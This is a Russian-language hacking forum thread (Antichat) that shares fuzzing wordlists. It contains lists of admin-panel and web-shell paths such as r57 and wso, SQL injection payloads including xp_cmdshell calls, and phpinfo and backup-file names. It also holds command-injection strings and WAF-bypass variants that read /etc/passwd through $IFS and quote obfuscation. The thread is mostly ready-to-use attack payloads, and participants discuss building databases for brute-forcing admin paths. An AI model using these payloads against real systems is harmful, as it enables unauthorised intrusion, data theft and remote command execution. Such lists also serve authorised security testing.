    privr57.EXT
    processlogin.EXT
    project-admins
    pureadmin
    r00t.EXT
    r57.EXT
    radmind
    radmind-1
    radmind-1/Super-Admin/AdminTools
    raiz
    rcLogin
    rcjakar
    rcjakar/acceso.EXT
    rcjakar/account.EXT
    rcjakar/adm.EXT
    rcjakar/adm_auth.EXT
    rcjakar/admin-login.EXT
    rcjakar/admin.EXT
    rcjakar/admin/login.EXT
    rcjakar/adminLogin.EXT
    rcjakar/admin_login.EXT
    rcjakar/admincontrol.EXT
    rcjakar/administrator.EXT
    rcjakar/administratorlogin.EXT
    rcjakar/adminpanel.EXT
    rcjakar/admloginuser.EXT
    rcjakar/affiliate.EXT
    rcjakar/controlpanel.EXT
    rcjakar/cp.EXT
    rcjakar/home.EXT
    rcjakar/index.EXT
    rcjakar/login.EXT
    rcjakar/memberadmin.EXT
    rcjakar/moderator.EXT
    rcjakar/user.EXT
    rcjakar/usuario.EXT
    rcjakar/usuarios.EXT
    rcjakar/webadmin.EXT
    rcjakar/wp-login.EXT
    registration
    relogin.EXT
    robots.txt
    root
    roots
    saff
    saudi.EXT
    secret
    secrets
    secure
    security
    senha
    senhas
    ser.EXT
    serv er
    server
    server_admin_small
    sff
    shell.EXT
    shellupload
    showlogin
    sign-in
    sign-in.EXT
    sign_in
    sign_in.EXT
    signin
    signin.EXT
    simattacker.EXT
    simpleLogin
    sistema
    site
    site/admin
    site_admin/login.EXT
    siteadmin
    siteadmin.EXT
    siteadmin/acceso.EXT
    siteadmin/account.EXT
    siteadmin/adm.EXT
    siteadmin/adm_auth.EXT
    siteadmin/admin-login.EXT
    siteadmin/admin.EXT
    siteadmin/adminLogin.EXT
    siteadmin/admin_login.EXT
    siteadmin/admincontrol.EXT
    siteadmin/administrator.EXT
    siteadmin/administratorlogin.EXT
    siteadmin/adminpanel.EXT
    siteadmin/admloginuser.EXT
    siteadmin/affiliate.EXT
    siteadmin/controlpanel.EXT
    siteadmin/cp.EXT
    siteadmin/home.EXT
    siteadmin/index.EXT
    siteadmin/login.EXT
    siteadmin/memberadmin.EXT
    siteadmin/moderator.EXT
    siteadmin/user.EXT
    siteadmin/usuario.EXT
    siteadmin/usuarios.EXT
    siteadmin/webadmin.EXT
    siteadmin/wp-login.EXT
    smblogin
    sosyete.EXT
    sql-admin
    ss_vms_admin_sm
    ss_vms_admin_sm/_admin
    ss_vms_admin_sm/adm
    ss_vms_admin_sm/admin1.EXT
    sshadmin
    staff
    staff/index.EXT
    staff/login.EXT
    staff/member.EXT
    staff/members.EXT
    staradmin
    staradmin/ServerAdministrator/SysAdmin
    sub-login
    super
    super.EXT
    super1
    super1.EXT
    super1asp
    super1php
    super_index
    super_index.EXT
    super_indexasp
    super_indexphp
    super_login
    super_login.EXT
    super_loginasp
    super_loginphp
    superadmin
    superasp
    superman
    superman.EXT
    supermanager
    supermanager.EXT
    supermanagerasp
    supermanagerphp
    supermanasp
    supermanphp
    superphp
    superuser
    superuser.EXT
    superuserasp
    superuserphp
    supervise
    supervise/Login
    supervise/Login.EXT
    supervise/Loginasp
    supervise/Loginphp
    supervisor
    support_login
    syrian.EXT
    sys-admin
    sysadm
    sysadm.EXT
    sysadmin
    sysadmin.EXT
    sysadmins
    system-administration
    system_administration
    tryag.EXT
    typo3
    uploadshell.EXT
    ur-admin
    ur-admin.EXT
    ur-admin/Server.EXT
    usager
    user
    user.EXT
    user/admin.EXT
    useradmin
    userlogin
    userlogin.EXT
    username
    users
    users.EXT
    users/acceso.EXT
    users/account.EXT
    users/adm.EXT
    users/adm_auth.EXT
    users/admin-login.EXT
    users/admin.EXT
    users/adminLogin.EXT
    users/admin_login.EXT
    users/admincontrol.EXT
    users/administrator.EXT
    users/administratorlogin.EXT
    users/adminpanel.EXT
    users/admloginuser.EXT
    users/affiliate.EXT
    users/controlpanel.EXT
    users/cp.EXT
    users/home.EXT
    users/index.EXT
    users/login.EXT
    users/memberadmin.EXT
    users/moderator.EXT
    users/user.EXT
    users/usuario.EXT
    users/usuarios.EXT
    users/webadmin.EXT
    users/wp-login.EXT
    usr
    usuario
    usuario.EXT
    usuario/acceso.EXT
    usuario/account.EXT
    usuario/adm.EXT
    usuario/adm_auth.EXT
    usuario/admin-login.EXT
    usuario/admin.EXT
    usuario/adminLogin.EXT
    usuario/admin_login.EXT
    usuario/admincontrol.EXT
    usuario/administrator.EXT
    usuario/administratorlogin.EXT
    usuario/adminpanel.EXT
    usuario/admloginuser.EXT
    usuario/affiliate.EXT
    usuario/controlpanel.EXT
    usuario/cp.EXT
    usuario/home.EXT
    usuario/index.EXT
    usuario/login.EXT
    usuario/memberadmin.EXT
    usuario/moderator.EXT
    usuario/user.EXT
    usuario/usuario.EXT
    usuario/usuarios.EXT
    usuario/webadmin.EXT
    usuario/wp-login.EXT
    usuarios
    usuarios.EXT
    usuarios/acceso.EXT
    usuarios/account.EXT
    usuarios/adm.EXT
    usuarios/adm_auth.EXT
    usuarios/admin-login.EXT
    usuarios/admin.EXT
    usuarios/adminLogin.EXT
    usuarios/admin_login.EXT
    usuarios/admincontrol.EXT
    usuarios/administrator.EXT
    usuarios/administratorlogin.EXT
    usuarios/adminpanel.EXT
    usuarios/admloginuser.EXT
    usuarios/affiliate.EXT
    usuarios/controlpanel.EXT
    usuarios/cp.EXT
    usuarios/home.EXT
    usuarios/index.EXT
    usuarios/login.EXT
    usuarios/memberadmin.EXT
    usuarios/moderator.EXT
    usuarios/user.EXT
    usuarios/usuario.EXT
    usuarios/usuarios.EXT
    usuarios/webadmin.EXT
    usuarios/wp-login.EXT
    utility_logi n
    utility_login
    uvpanel
    vadmind
    vmailadmin
    vmailadmin/Indy_admin
    vorod
    vorod.EXT
    vorud
    vorud.EXT
    web-beheerder
    web-master
    webadmin
    webadmin.EXT
    webadmin/acceso.EXT
    webadmin/account.EXT
    webadmin/adm.EXT
    webadmin/adm_auth.EXT
    webadmin/admin-login.EXT
    webadmin/admin.EXT
    webadmin/adminLogin.EXT
    webadmin/admin_login.EXT
    webadmin/admincontrol.EXT
    webadmin/administrator.EXT
    webadmin/administratorlogin.EXT
    webadmin/adminpanel.EXT
    webadmin/admloginuser.EXT
    webadmin/affiliate.EXT
    webadmin/controlpanel.EXT
    webadmin/cp.EXT
    webadmin/home.EXT
    webadmin/index.EXT
    webadmin/login.EXT
    webadmin/login.EXTbrf
    webadmin/memberadmin.EXT
    webadmin/moderator.EXT
    webadmin/user.EXT
    webadmin/usuario.EXT
    webadmin/usuarios.EXT
    webadmin/webadmin.EXT
    webadmin/wp-login.EXT
    webbeheerder
    webmaster
    webmaster.EXT
    websvn
    wizmysqladmin
    wp-admin
    wp-login
    wp-login.EXT
    wplogin
    wso.EXT
    x2300.EXT
    xlogin
    yonetici.EXT
    yonetim.EXT
    ysadmin.EXT
    zaco.EXT

    SQL Injection -(Update: 11 August 2009 - Total Statements: 126)

    Code:
    Statement
    'sqlvuln
    '+sqlvuln
    sqlvuln;
    (sqlvuln)
    a' or 1=1--
    "a"" or 1=1--"
     or a = a
    a' or 'a' = 'a
    1 or 1=1
    a' waitfor delay '0:0:10'--
    1 waitfor delay '0:0:10'--
    declare @q nvarchar (4000) select @q =
    0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
    0
    031003000270000
    declare @s varchar(22) select @s =
    0x77616974666F722064656C61792027303A303A31302700 exec(@s)
    0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
    declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
    exec(@s)
    a'
    ?
    ' or 1=1
    ‘ or 1=1 --
    x' AND userid IS NULL; --
    x' AND email IS NULL; --
    anything' OR 'x'='x
    x' AND 1=(SELECT COUNT(*) FROM tabname); --
    x' AND members.email IS NULL; --
    x' OR full_name LIKE '%Bob%
    23 OR 1=1
    '; exec master..xp_cmdshell 'ping 172.10.1.255'--
    '
    '%20or%20''='
    '%20or%20'x'='x
    %20or%20x=x
    ')%20or%20('x'='x
    0 or 1=1
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
     or 0=0 #"
    or 0=0 #
    ' or 1=1--
    " or 1=1--
    ' or '1'='1'--
    ' or 1 --'
    or 1=1--
    or%201=1
    or%201=1 --
    ' or 1=1 or ''='
     or 1=1 or ""=
    ' or a=a--
     or a=a
    ') or ('a'='a
    ) or (a=a
    hi or a=a
    hi or 1=1 --"
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    "hi"") or (""a""=""a"
    'hi' or 'x'='x';
    @variable
    ,@variable
    PRINT
    PRINT @@variable
    select
    insert
    as
    or
    procedure
    limit
    order by
    asc
    desc
    delete
    update
    distinct
    having
    truncate
    replace
    like
    handler
    bfilename
    ' or username like '%
    ' or uname like '%
    ' or userid like '%
    ' or uid like '%
    ' or user like '%
    exec xp
    exec sp
    '; exec master..xp_cmdshell
    '; exec xp_regread
    t'exec master..xp_cmdshell 'nslookup www.google.com'--
    --sp_password
    \x27UNION SELECT
    ' UNION SELECT
    ' UNION ALL SELECT
    ' or (EXISTS)
    ' (select top 1
    '||UTL_HTTP.REQUEST
    1;SELECT%20*
    to_timestamp_tz
    tz_offset
    <>"'%;)(&+
    '%20or%201=1
    %27%20or%201=1
    %20$(sleep%2050)
    %20'sleep%2050'
    char%4039%41%2b%40SELECT
    &apos;%20OR
    'sqlattempt1
    (sqlattempt2)
    |
    %7C
    *|
    %2A%7C
    *(|(mail=*))
    %2A%28%7C%28mail%3D%2A%29%29
    *(|(objectclass=*))
    %2A%28%7C%28objectclass%3D%2A%29%29
    (
    %28
    )
    %29
    &
    %26
    !
    %21
    ' or 1=1 or ''='
    ' or ''='
    x' or 1=1 or 'x'='y
    /
    //
    //*
    */*
    a' or 3=3--
    "a"" or 3=3--"
    ' or 3=3
    ‘ or 3=3 --
     
    #1 b3, 25 Dec 2018
    Last edited: 6 May 2019
    CyberTro1n, Spinus and crlf like this.
  2. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
  3. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Поддерживаю. Скидывайте базы(паттерны) по RCE в первую очередь.

    Так-же, не лишним будет сюда добавить и базы(паттерны) под всевозможные формы, AJAX запросы, и так далее.
    Предложил - начну:
    Code:
    <form.+action\=(.+?)[> ]
    \$\.[ajax|post|get]\(\{
    open\([\'\"]
    
    Надеюсь, этот список будет дополнен :)
     
  4. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    обработаю ваши ссылки и составлю базу для брута путей админок и pma-аналогов
     
  5. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    немного добавил в первый пост
     
    RedHazard likes this.
  6. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Phpinfo files
    -----------------
    Code:
    phpinfo.php
    php.php
    php.ini
    temp.php
    test.php
    info.php
    phpphp.php
    asd.php
    asdf.php
    123.php
    test1.php
    qqq.php
    php.info.php
    i.php
    qwe.php
    qwerty.php
    q.php
    z.php
    a.php
    aa.php
    aaa.php
    testphpinfo.php
    testing.php
    inf.php
    _phpinfo.php
    _php.php
    _php.ini
    _temp.php
    _test.php
    _info.php
    _phpphp.php
    _asd.php
    _asdf.php
    _123.php
    _test1.php
    _qqq.php
    _php.info.php
    _i.php
    _qwe.php
    _qwerty.php
    _q.php
    _z.php
    _a.php
    _aa.php
    _aaa.php
    phpinfo_.php
    php_.php
    php_.ini
    temp_.php
    test_.php
    info_.php
    phpphp_.php
    asd_.php
    asdf_.php
    123_.php
    test1_.php
    qqq_.php
    php.info_.php
    i_.php
    qwe_.php
    qwerty_.php
    q_.php
    z_.php
    a_.php
    aa_.php
    aaa_.php
    

    Backup files exstensions
    -----------------
    Code:
    ~
    .txt
    .bak
    .old
    .bck
    .save
    .sav
    .copy
    .orig
    .back
    .backup
    .bkp
    .bac
    .0
    .1
    .2
    .000
    .001
    .002
    .gz
    .copia
    .saved
    .tar
    .gz
    .tgz
    .7z
    .tar.gz
    .tar.bz2
    .bz2
    .zip
    .rar
    _txt
    _bak
    _old
    _bck
    _save
    _sav
    _copy
    _orig
    _back
    _backup
    _bkp
    _bac
    _0
    _1
    _2
    _000
    _001
    _002
    _copia
    _saved
    BAK
    OLD
    BCK
    SAVE
    SAV
    COPY
    ORIG
    BACK
    BACKUP
    BKP
    BAC
    TXT
    0
    1
    2
    000
    001
    002
    COPIA
    SAVED
    

    Default RCE fuzzdb
    -----------------
    Code:
    /usr/bin/id
    /bin/uname
    uname
    sleep 100
    ping your_ip
    /bin/sleep 100
    /bin/ping your_ip
    &/usr/bin/id
    &/bin/uname
    &uname
    &sleep 100
    &ping your_ip
    &/bin/sleep 100
    &/bin/ping your_ip
    &&/usr/bin/id
    &&/bin/uname
    &&uname
    &&sleep 100
    &&ping your_ip
    &&/bin/sleep 100
    &&/bin/ping your_ip
    |/usr/bin/id
    |/bin/uname
    |uname
    |sleep 100
    |ping your_ip
    |/bin/sleep 100
    |/bin/ping your_ip
    ||/usr/bin/id
    ||/bin/uname
    ||uname
    ||sleep 100
    ||ping your_ip
    ||/bin/sleep 100
    ||/bin/ping your_ip
    ;/usr/bin/id
    ;/bin/uname
    ;uname
    ;sleep 100
    ;ping your_ip
    ;/bin/sleep 100
    ;/bin/ping your_ip
    %0a /usr/bin/id
    %0a /bin/uname
    %0a uname
    %0a sleep 100
    %0a ping your_ip
    %0a/bin/sleep 100
    %0a/bin/ping your_ip
    %0a%0d /usr/bin/id
    %0a%0d /bin/uname
    %0a%0d uname
    %0a%0d sleep 100
    %0a%0d ping your_ip
    %0a%0d/bin/sleep 100
    %0a%0d/bin/ping your_ip
    `/usr/bin/id`
    `/bin/uname`
    `uname`
    `sleep 100`
    `ping your_ip`
    `/bin/sleep 100`
    `/bin/ping your_ip`
    $(/usr/bin/id)
    $(/bin/uname)
    $(uname)
    $(sleep 100)
    $(ping your_ip)
    $(/bin/sleep 100)
    $(/bin/ping your_ip)
    '/usr/bin/id
    '/bin/uname
    'uname
    'sleep 100
    'ping your_ip
    '/bin/sleep 100
    '/bin/ping your_ip
    '&/usr/bin/id
    '&/bin/uname
    '&uname
    '&sleep 100
    '&ping your_ip
    '&/bin/sleep 100
    '&/bin/ping your_ip
    '&&/usr/bin/id
    '&&/bin/uname
    '&&uname
    '&&sleep 100
    '&&ping your_ip
    '&&/bin/sleep 100
    '&&/bin/ping your_ip
    '|/usr/bin/id
    '|/bin/uname
    '|uname
    '|sleep 100
    '|ping your_ip
    '|/bin/sleep 100
    '|/bin/ping your_ip
    '||/usr/bin/id
    '||/bin/uname
    '||uname
    '||sleep 100
    '||ping your_ip
    '||/bin/sleep 100
    '||/bin/ping your_ip
    ';/usr/bin/id
    ';/bin/uname
    ';uname
    ';sleep 100
    ';ping your_ip
    ';/bin/sleep 100
    ';/bin/ping your_ip
    '%0a /usr/bin/id
    '%0a /bin/uname
    '%0a uname
    '%0a sleep 100
    '%0a ping your_ip
    '%0a/bin/sleep 100
    '%0a/bin/ping your_ip
    '%0a%0d /usr/bin/id
    '%0a%0d /bin/uname
    '%0a%0d uname
    '%0a%0d sleep 100
    '%0a%0d ping your_ip
    '%0a%0d/bin/sleep 100
    '%0a%0d/bin/ping your_ip
    "/usr/bin/id
    "/bin/uname
    "uname
    "sleep 100
    "ping your_ip
    "/bin/sleep 100
    "/bin/ping your_ip
    "&/usr/bin/id
    "&/bin/uname
    "&uname
    "&sleep 100
    "&ping your_ip
    "&/bin/sleep 100
    "&/bin/ping your_ip
    "&&/usr/bin/id
    "&&/bin/uname
    "&&uname
    "&&sleep 100
    "&&ping your_ip
    "&&/bin/sleep 100
    "&&/bin/ping your_ip
    "|/usr/bin/id
    "|/bin/uname
    "|uname
    "|sleep 100
    "|ping your_ip
    "|/bin/sleep 100
    "|/bin/ping your_ip
    "||/usr/bin/id
    "||/bin/uname
    "||uname
    "||sleep 100
    "||ping your_ip
    "||/bin/sleep 100
    "||/bin/ping your_ip
    ";/usr/bin/id
    ";/bin/uname
    ";uname
    ";sleep 100
    ";ping your_ip
    ";/bin/sleep 100
    ";/bin/ping your_ip
    "%0a /usr/bin/id
    "%0a /bin/uname
    "%0a uname
    "%0a sleep 100
    "%0a ping your_ip
    "%0a/bin/sleep 100
    "%0a/bin/ping your_ip
    "%0a%0d /usr/bin/id
    "%0a%0d /bin/uname
    "%0a%0d uname
    "%0a%0d sleep 100
    "%0a%0d ping your_ip
    "%0a%0d/bin/sleep 100
    "%0a%0d/bin/ping your_ip
    

    Default RCE waf bypass fuzz_db
    -----------------
    Code:
    /usr/bin/id
    /bin/uname
    uname
    sleep 100
    ping your_ip
    /bin/sleep 100
    /bin/ping your_ip
    /???/???/?d
     /???/u???e
    /???/s???p 100
    /???/p??g your_ip
    /???/s???p$IFS\100
    /???/p??g$IFS\your_ip
    /???/s???p${IFS}100
    /???/p??g${IFS}your_ip   
    /b*/sl*p 100
    /b*/p*g your_ip
    /u*/b*/id
    /b*/u*e   
    /b*/sl*p$IFS\100
    /b*/sl*p${IFS}100
    /b*/p*g$IFS\your_ip
    /b*/p*g${IFS}your_ip
    /u"s"r/b"i"n/"i"d
    /"b"i"n"/"u"n"a"m"e"
    u"n"a"m"e
    s"l"e"e"p 100
    p"i"n"g" your_ip
    /"b"i"n"/"s"l"e"e"p" 100
    /"b"i"n"/"p"i"n"g your_ip
    /u's'r/b'i'n/'i'd
    /'b'i'n'/'u'n'a'm'e'
    u'n'a'm'e
    s'l'e'e'p 100
    p'i'n'g' your_ip
    /'b'i'n'/'s'l'e'e'p' 100
    /'b'i'n'/'p'i'n'g your_ip
    /usr$d/bin$d/id$d
    /bin$d/uname$d
    uname$d
    sleep$d 100
    ping$d your_ip
    /bin$d/sleep$d 100
    /bin$d/ping$d your_ip
    /\u\s\r/\b\i\n/\i\d
    /\b\i\n/\u\n\a\m\e
    \u\n\a\m\e
    \s\l\e\e\p 100
    \p\i\n\g your_ip
    /\b\i\n/\s\l\e\e\p 100
    /\b\i\n/\p\i\n\g your_ip
    /\\u\\s\\r/\\b\\i\\n/\\i\\d
    /\\b\\i\\n/\\u\\n\\a\\m\\e
    \\u\\n\\a\\m\\e
    \\s\\l\\e\\e\\p 100
    \\p\\i\\n\\g your_ip
    /\\b\\i\\n/\\s\\l\\e\\e\\p 100
    /\\b\\i\\n/\\p\\i\\n\\g your_ip
    /\u$d\s$d\r$d/\b$d\i$d\n$d/\i$d\d$d
    /\b$d\i$d\n$d/\u$d\n$d\a$d\m$d\e$d
    \u$d\n$d\a$d\m$d\e$d
    \s$d\l$d\e$d\e$d\p$d 100
    \p$d\i$d\n$d\g$d your_ip
    /\b$d\i$d\n$d/\s$d\l$d\e$d\e$d\p$d 100
    /\b$d\i$d\n$d/\p$d\i$d\n$d\g$d your_ip
    /\\u$d\\s$d\\r$d/\\b$d\\i$d\\n$d/\\i$d\\d$d
    /\\b$d\\i$d\\n$d/\\u$d\\n$d\\a$d\\m$d\\e$d
    \\u$d\\n$d\\a$d\\m$d\\e$d
    \\s$d\\l$d\\e$d\\e$d\\p$d 100
    \\p$d\\i$d\\n$d\\g$d your_ip
    /\\b$d\\i$d\\n$d/\\s$d\\l$d\\e$d\\e$d\\p$d 100
    /\\b$d\\i$d\\n$d/\\p$d\\i$d\\n$d\\g$d your_ip
    /u$d"s"$d"r"$d/b$d"i"$d"n"$d/id$d
    /b$d"i"$d"n"$d/u$d"n"$d"a"$d"m"$d"e"$d
    u$d"n"$d"a"$d"m"$d"e"$d
    s$d"l"$d"e"$d"e"$d"p"$d 100
    p$d"i"$d"n"$d"g"$d your_ip
    /b$d"i"$d"n"$d/s$d"l"$d"e"$d"e"$d"p"$d 100
    /b$d"i"$d"n"$d/p$d"i"$d"n"$d"g"$d your_ip
    /u$d's'$d'r'$d/b$d'i'$d'n'$d/id$d
    /b$d'i'$d'n'$d/u$d'n'$d'a'$d'm'$d'e'$d
    u$d'n'$d'a'$d'm'$d'e'$d
    s$d'l'$d'e'$d'e'$d'p'$d 100
    p$d'i'$d'n'$d'g'$d your_ip
    /b$d'i'$d'n'$d/s$d'l'$d'e'$d'e'$d'p'$d 100
    /b$d'i'$d'n'$d/p$d'i'$d'n'$d'g'$d your_ip
    cat<>/etc/passwd
    cat</etc/passwd
    cat<>/etc/hosts
    cat</etc/hosts
    cat$d<>/etc$d/passwd$d
    cat$d</etc$d/passwd$d
    c\a$d\t<>/\e$d\t\c/\p$d\a\s$d\s\w\d
    c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d'i'n/c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d"i"n/c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts
    c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts
    /bin/cat</etc/passwd
    /bin/cat<>/etc/passwd
    c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
    cat$IFS/etc/passwd
    cat${IFS}/etc/passwd
    cat$d$IFS/etc$d/passwd$d
    cat$d${IFS}/etc$d/passwd$d
    /bin/cat$IFS/etc/passwd
    /bin/cat${IFS}/etc/passwd
    sleep${IFS}100
    ping${IFS}your_ip
    /bin/sleep${IFS}100
    /bin/ping${IFS}your_ip
    sleep$d${IFS}100$d
    c\a$d\t$IFS/\e$d\t\c/\p$d\a\s$d\s\w\d
    c\a$d\t${IFS}/\e$d\t\c/\p$d\a\s$d\s\w\d
    c\\a$d\\t$IFS/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
    c\\a$d\\t${IFS}/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
    c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
    c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d'i'n/c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
    /b$d"i"n/c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts
    c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts
    sleep$IFS\100
    ping$IFS\your_ip
    /bin/sleep$IFS\100
    /bin/ping$IFS\your_ip
    sleep$d$IFS\100$d
    ping$d$IFS\your_ip$d
    /bin$d/sleep$d$IFS\100$d
    /bin$d/ping$d$IFS\your_ip$d
    sle$d'e'p$d$IFS\100$d
    pi$d'n'g$d$IFS\your_ip$d
    /b$d'i'n$d/sl$d'e'ep$d$IFS\100$d
    \s\l\e\e\p$d$IFS\100$d
    \p\i\n\g$d$IFS\your_ip$d
    /\b\i\n$d/\s\l\e\e\p$d$IFS\100$d
    /\b\i\n$d/\p\i\n\g$d$IFS\your_ip$d
    sle$d"e"p$d$IFS\100$d
    pi$d"n"g$d$IFS\your_ip$d
    /b$d"i"n$d/sl$d"e"ep$d$IFS\100$d
    \\s\\l\\e\\e\\p$d$IFS\\100$d
    \\p\\i\\n\\g$d$IFS\\your_ip$d
    /\\b\\i\\n$d/\\s\\l\\e\\e\\p$d$IFS\\100$d
    /\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d
    \s\l\e$d\e\p$d$IFS\100$d
    \p\i$d\n\g$d$IFS\your_ip$d
    /\b$d\i\n$d/sl$d\e\\p$d$IFS\100$d
    \\s\\l\\e\\e\\p$d${IFS}\\100$d
    \\p\\i\\n\\g$d${IFS}\\your_ip$d
    /\\b\\i\\n$d/\\s\\l\\e\\e\\p$d${IFS}\\100$d
    /\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d
    \\s\l\\e$d\\e\\p$d$IFS\\100$d
    \\p\\i$d\\n\\g$d$IFS\\your_ip$d
    /\\b$d\\i\\n$d/sl$d\\e\\p$d$IFS\\100$d
    \s\l\e\e\p${d}${IFS}\100${d}
    \p\i\n\g${d}${IFS}\your_ip${d}
    /\b\i\n${d}/\s\l\e\e\p${d}${IFS}\100${d}
    /\b\i\n$d/\p\i\n\g$d${IFS}\your_ip${d}
    \\s\l\\e${d}\\e\\p${d}${IFS}\\100${d}
    \\p\\i${d}\\n\\g${d}${IFS}\\your_ip${d}
    /\\b${d}\\i\\n${d}/sl${d}\\e\\p${d}${IFS}\\100${d}
    s"l"e"e"p${d}${IFS}100${d}
    p"i"n"g"${d}${IFS}your_ip${d}
    /"b"i"n"${d}/"s"l"e"e"p"${d}${IFS}100${d}
    /"b"i"n"$d/"p"i"n"g${d}${IFS}your_ip${d}
    \s\l\e${d}\e\p${d}${IFS}\100${d}
    \p\i${d}\n\\g${d}${IFS}\your_ip${d}
    /\b${d}\i\n${d}/sl${d}\e\p${d}${IFS}\100${d}
    s'l'e'e'p${d}${IFS}100${d}
    p'i'n'g'${d}${IFS}your_ip${d}
    /'b'i'n'${d}/'s'l'e'e'p'${d}${IFS}100${d}
    /'b'i'n'$d/'p'i'n'g${d}${IFS}your_ip${d}
    s"l"e${d}"e"p${d}${IFS}100${d}
    p"i"${d}"n"g${d}${IFS}your_ip${d}
    /"b"${d}i"n"${d}/s"l"${d}"e"p${d}${IFS}100${d}
    s'l'e${d}'e'p${d}${IFS}100${d}
    p'i'${d}'n'g${d}${IFS}your_ip${d}
    /'b'${d}i'n'${d}/s'l'${d}'e'p${d}${IFS}100${d}
    /\\b\\i\\n/\\c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
    /\b\i\n/\c\a$d\t<>/\e$d\t\c/\p$d\a\s$d\s\w\d
    s'l'e${d}'e'p${d}${IFS}100${d}
    cat${d}<>/etc${d}/passwd${d}
    /bin$d/cat$d<>/etc$d/passwd$d
    /bin${d}/cat${d}<>/etc${d}/passwd${d}
    /b${d}in/c${d}at<>/e${d}tc/pas${d}swd
    /bin$d/cat$d</etc$d/passwd$d
    /bin${d}/cat${d}</etc${d}/passwd${d}
    /b${d}in/c${d}at</e${d}tc/pas${d}swd
    /u${d}sr/bi${d}n/i${d}d
    /b${d}in/un${d}ame
    un${d}am${d}e
    sl${d}e${d}ep 100
    pin${d}g your_ip
    /b${d}in/sl${d}eep 100
    /b${d}in/p${d}ing your_ip
    sl${d}e${d}ep${IFS}100
    pin${d}g${IFS}yo${d}ur_ip
    /b${d}in/sl${d}eep${IFS}100
    /b${d}in/p${d}ing${IFS}your_ip
    ca${d}t$<>/et${d}c/pa${d}s${d}s${d}w${d}d
    /b${d}in/ca${d}t$<>/et${d}c/pa${d}s${d}s${d}w${d}d
    /b${d}in/ca${d}t$</et${d}c/pa${d}s${d}s${d}w${d}d
    /u$2sr/bi$2n/i$2d
    /b$2in/un$2ame
    un$2am$2e
    sl$2e$2ep 100
    pin$2g your_ip
    /b$2in/sl$2eep 100
    /b$2in/p$2ing your_ip
    sl$2e$2ep$IFS\100
    pin$2g$IFS\your_ip
    sl$2e$2ep${IFS}\100
    pin$2g${IFS}your_ip
    /b$2in/sl$2eep${IFS}100
    /b$2in/p$2ing${IFS}your_ip
    ca$2t$<>/et$2c/pa$2s$2s$2w$2d
    ca$2t$</et$2c/pa$2s$2s$2w$2d
    /b$2in/ca$2t$<>/et$2c/pa$2s$2s$2w$2d
    /b$2in/ca$2t$</et$2c/pa$2s$2s$2w$2d
    /u$*sr/bi$*n/i$*d
    /b$*in/un$*ame
    un$*am$*e
    sl$*e$*ep 100
    pin$*g your_ip
    /b$*in/sl$*eep 100
    /b$*in/p$*ing your_ip
    sl$*e$*ep$IFS\100
    pin$*g$IFS\your_ip
    sl$*e$*ep${IFS}\100
    pin$*g${IFS}your_ip
    /b$*in/sl$*eep${IFS}100
    /b$*in/p$*ing${IFS}your_ip
    ca$*t$<>/et$*c/pa$*s$*s$*w$*d
    ca$*t</et$*c/pa$*s$*s$*w$*d
    /b$*in/ca$*t$<>/et$*c/pa$*s$*s$*w$*d
    /b$*in/ca$*t</et$*c/pa$*s$*s$*w$*d
    /u$@sr/bi$@n/i$@d
    /b$@in/un$@ame
    un$@am$@e
    sl$@e$@ep 100
    pin$@g your_ip
    /b$@in/sl$@eep 100
    /b$@in/p$@ing your_ip
    sl$@e$@ep$IFS\100
    pin$@g$IFS\your_ip
    sl$@e$@ep${IFS}\100
    pin$@g${IFS}your_ip
    /b$@in/sl$@eep${IFS}100
    /b$@in/p$@ing${IFS}your_ip
    ca$@t$<>/et$@c/pa$@s$@s$@w$@d
    ca$@t</et$@c/pa$@s$@s$@w$@d
    /b$@in/ca$@t$<>/et$@c/pa$@s$@s$@w$@d
    /b$@in/ca$@t</et$@c/pa$@s$@s$@w$@d
    /u$!sr/bi$!n/i$!d
    /b$!in/un$!ame
    un$!am$!e
    sl$!e$!ep 100
    pin$!g your_ip
    /b$!in/sl$!eep 100
    /b$!in/p$!ing your_ip
    sl$!e$!ep$IFS\100
    pin$!g$IFS\your_ip
    sl$!e$!ep${IFS}\100
    pin$!g${IFS}your_ip
    /b$!in/sl$!eep${IFS}100
    /b$!in/p$!ing${IFS}your_ip
    ca$!t$<>/et$!c/pa$@s$@s$@w$@d
    ca$!t</et$!c/pa$!s$!s$!w$!d
    /b$!in/ca$!t$<>/et$!c/pa$!s$!s$!w$!d
